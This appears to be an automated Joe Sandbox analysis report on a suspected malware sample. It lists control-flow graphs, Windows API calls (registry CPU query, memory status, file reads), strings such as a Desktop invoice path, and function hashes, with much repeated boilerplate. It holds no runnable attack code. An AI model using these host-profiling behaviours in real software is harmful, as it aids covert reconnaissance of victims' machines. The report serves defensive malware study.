          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep$CreateDirectory
          • String ID: LocalAppData$UserProfile$\Desktop\Invoice.docx$\Poconusuri
          • API String ID: 2746843503-705830698
          • Opcode ID: 656e8fae4260d24d6d784f61f03aa9f907377b7c9a32a1c65937efcc8cc4f53f
          • Instruction ID: 8ad1c3b01dce8749ce832423d5392875bb1b75fa451e82c312bdd818018c4d0b
          • Opcode Fuzzy Hash: 656e8fae4260d24d6d784f61f03aa9f907377b7c9a32a1c65937efcc8cc4f53f
          • Instruction Fuzzy Hash: A931853460161257DF693BA4D8263FF62A3DF81306F148578FA418F7D7EE388A8A4356

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1298 6fe3eb-6fe419 call 7c7640 1301 6fe41f 1298->1301 1302 6fe51a-6fe52c 1298->1302 1303 6fe421-6fe42b 1301->1303 1304 6fe532-6fe547 1302->1304 1303->1303 1305 6fe42d-6fe43c 1303->1305 1306 6fe549-6fe553 1304->1306 1307 6fe555-6fe558 1304->1307 1308 6fe43e 1305->1308 1309 6fe46c-6fe4a7 call 702ea4 call 700149 1305->1309 1310 6fe564-6fe566 1306->1310 1311 6fe55a-6fe561 1307->1311 1312 6fe568 1307->1312 1314 6fe444-6fe44c 1308->1314 1325 6fe4ac-6fe4d4 call 700149 1309->1325 1313 6fe56b-6fe56e 1310->1313 1311->1310 1312->1313 1313->1304 1316 6fe570-6fe57d call 702ee6 1313->1316 1317 6fe44e-6fe461 call 702c70 1314->1317 1318 6fe464-6fe46a 1314->1318 1317->1318 1318->1309 1318->1314 1328 6fe4d6-6fe4e1 1325->1328 1329 6fe4e3-6fe4ef 1328->1329 1330 6fe4f1-6fe4f4 1328->1330 1331 6fe502-6fe509 1329->1331 1332 6fe50b 1330->1332 1333 6fe4f6-6fe4fb 1330->1333 1334 6fe513-6fe516 1331->1334 1332->1334 1333->1331 1334->1328 1335 6fe518 1334->1335 1335->1316
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: String___crt$_memset
          • String ID:
          • API String ID: 3770204449-3916222277
          • Opcode ID: 874c729ea067fc72b0ba3f98a6d3128bb8c931658f4a93bf95fd253cea380beb
          • Instruction ID: 1cc587a1cb20d6c18bd9a60de47e78e3878923b88fce73ded587ef106329dd10
          • Opcode Fuzzy Hash: 874c729ea067fc72b0ba3f98a6d3128bb8c931658f4a93bf95fd253cea380beb
          • Instruction Fuzzy Hash: E541077150475C9EDB218B248C89BFB7FEAAB45308F1444ECE68687193E2769A458F50

          Control-flow Graph

          APIs
          • ___scrt_release_startup_lock.LIBCMT ref: 00060822
          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00060836
          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0006085C
          • ___scrt_uninitialize_crt.LIBCMT ref: 0006089F
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
          • String ID:
          • API String ID: 3089971210-0
          • Opcode ID: 6ae1d31d71caabf617f09caeb9a60af7ded6262a219c95a9b0b0034e0b36c09b
          • Instruction ID: 1c9722a2001fea837fe499f92ef93990a7466bbb46a1e546d83cc270310cbcfc
          • Opcode Fuzzy Hash: 6ae1d31d71caabf617f09caeb9a60af7ded6262a219c95a9b0b0034e0b36c09b
          • Instruction Fuzzy Hash: C12108326C43116ADA31BB649C07ADF67E3DF42764F20012AF5812B1D3DF66494196E5

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1367 5dae0-5db29 call 54790 1370 5dbb0-5dbc3 1367->1370 1371 5db2f-5db53 call 60380 RegOpenKeyExW 1367->1371 1374 5db55-5db7f call 60380 RegQueryValueExW 1371->1374 1375 5dba9-5dbab call 54840 1371->1375 1379 5db81-5db9e call 60380 1374->1379 1380 5db9f-5dba4 call 60380 1374->1380 1375->1370 1380->1375
          APIs
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          • RegOpenKeyExW.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,0006BF40,7D5DF9B0,00000000,00000000), ref: 0005DB4F
          • RegQueryValueExW.KERNELBASE(0006BF40,0005E402,00000000,00000000,00000000,00000400), ref: 0005DB71
          Strings
          • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0005DB49
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: OpenQueryValuemalloc
          • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0
          • API String ID: 147835836-1200804856
          • Opcode ID: 8f146ee03062c1df6da1613ad255892123dabbe68702137413276781ec9defe4
          • Instruction ID: dbbfe605d9876d6024a88ddd8cfe03fef7ebb9a1dca53e87e7ad00e5f207957b
          • Opcode Fuzzy Hash: 8f146ee03062c1df6da1613ad255892123dabbe68702137413276781ec9defe4
          • Instruction Fuzzy Hash: B921F671A44115AFEB14DB98DC02BBFB7A9EF84715F10417AFA14A73C1DB355E008790

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1386 5dfe0-5e049 call 61910 call 60380 GlobalMemoryStatusEx 1391 5e0d1 1386->1391 1392 5e04f-5e079 call 6bad0 call 54790 1386->1392 1393 5e0d3-5e0ee call 6048f 1391->1393 1399 5e07e-5e082 1392->1399 1399->1391 1400 5e084-5e0bd call 60380 1399->1400 1400->1393
          APIs
          • GlobalMemoryStatusEx.KERNELBASE(00000040,00000000,00000000,00000001), ref: 0005E045
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: GlobalMemoryStatusmalloc
          • String ID: %.2f MB (%.2f GB)$@
          • API String ID: 207635350-642326303
          • Opcode ID: a318dd3f03ca78c9ad0eae6b2c2201d338859e37aaa9770cbd1443c787e0bc99
          • Instruction ID: e54ac3852be45dab6fa8472985b23c16b1eb83c40a090cc903d052a56c3abf9e
          • Opcode Fuzzy Hash: a318dd3f03ca78c9ad0eae6b2c2201d338859e37aaa9770cbd1443c787e0bc99
          • Instruction Fuzzy Hash: 3021AE71E40B5C9BD711EFA4CC11BAFB7B9EF49750F008229E909AB281DF7899808790

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1404 5a510-5a574 call 60380 CreateFileW 1407 5a62a-5a641 call 60380 1404->1407 1408 5a57a-5a5d1 call 60380 call 5a040 call 60380 * 2 1404->1408 1415 5a674 1407->1415 1416 5a643-5a653 call 54790 1407->1416 1408->1407 1439 5a5d3-5a628 call 60380 call 59db0 call 60380 * 2 1408->1439 1418 5a679-5a683 call 60380 1415->1418 1416->1418 1426 5a655-5a66b call 60380 ReadFile 1416->1426 1430 5a686-5a699 1418->1430 1431 5a66d-5a66f call 54840 1426->1431 1432 5a69a-5a6c8 call 60380 FindCloseChangeNotification 1426->1432 1431->1415 1439->1407 1439->1430
          APIs
          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,7D5DF9B0,00000000,?), ref: 0005A56D
          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0005A667
          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0005A6B0
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: File$ChangeCloseCreateFindNotificationRead
          • String ID:
          • API String ID: 2525391649-0
          • Opcode ID: dc77303a6ef89cf07e3181c29ba63e41d403ff85d992cf88cde4a9cb5e48892a
          • Instruction ID: 5c9fba7ac555c56ad402cc4d0459982546167f79a197cbf482721f31fa8d27c7
          • Opcode Fuzzy Hash: dc77303a6ef89cf07e3181c29ba63e41d403ff85d992cf88cde4a9cb5e48892a
          • Instruction Fuzzy Hash: 624124307812106BE354E768CC52FAFB39ADB85710F208368FA54AB3C2DE782F058355

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1451 5a3e0-5a444 call 60380 CreateFileW 1454 5a446-5a45d call 60380 1451->1454 1455 5a47c-5a48f 1451->1455 1459 5a4b1-5a4b9 1454->1459 1460 5a45f-5a46f call 54790 1454->1460 1461 5a474-5a479 call 60380 1459->1461 1465 5a471 1460->1465 1466 5a490-5a4a8 call 60380 ReadFile 1460->1466 1461->1455 1465->1461 1470 5a4bb-5a4e9 call 60380 FindCloseChangeNotification 1466->1470 1471 5a4aa-5a4ac call 54840 1466->1471 1471->1459
          APIs
          • CreateFileW.KERNELBASE(003A60A5,80000000,00000007,00000000,00000003,00000080,00000000,7D5DF9B0,00000001,?), ref: 0005A43D
          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0005A4A4
          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0005A4D1
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: File$ChangeCloseCreateFindNotificationReadmalloc
          • String ID:
          • API String ID: 3030868933-0
          • Opcode ID: 0d7a0df5af22e230d4f3bfebb7c531e3786f628436d433eea651e926c987b041
          • Instruction ID: 310ef416ba3fc35ce741c9fad48f15c3aeb80c4722f6d5eb00a6ea32e321bfec
          • Opcode Fuzzy Hash: 0d7a0df5af22e230d4f3bfebb7c531e3786f628436d433eea651e926c987b041
          • Instruction Fuzzy Hash: 02312531701614ABD714EBA8CC41BAFB7A9EB86320F104369F915EB3C1DB786E058795
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: malloc
          • String ID:
          • API String ID: 2803490479-0
          • Opcode ID: e6b20e7136eaf225ead9669c55d895fecdeeab65b9cf6d86eb5e011854791531
          • Instruction ID: 807259a2224352d6cccd3686e8d714b606015058a99c83894affaede93009279
          • Opcode Fuzzy Hash: e6b20e7136eaf225ead9669c55d895fecdeeab65b9cf6d86eb5e011854791531
          • Instruction Fuzzy Hash: 6721D6713416156BE3109F58EC81B9BB7D9EF84769F108539F649CB682DB30D9048B90
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __mtterm
          • String ID:
          • API String ID: 13288775-0
          • Opcode ID: bb3b4fef79ff40b797f52ec53adaaaf4c46e1792d09417c137102318ad7435d3
          • Instruction ID: 4769802cd3aa723f287484ec0f1d42076249fe283dc1389e14d2d1d980cd83f1
          • Opcode Fuzzy Hash: bb3b4fef79ff40b797f52ec53adaaaf4c46e1792d09417c137102318ad7435d3
          • Instruction Fuzzy Hash: 7111233254524CD9DA35FBB9BC068FE2F5B9E917A0730452AF304801B2DE3B88528169
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
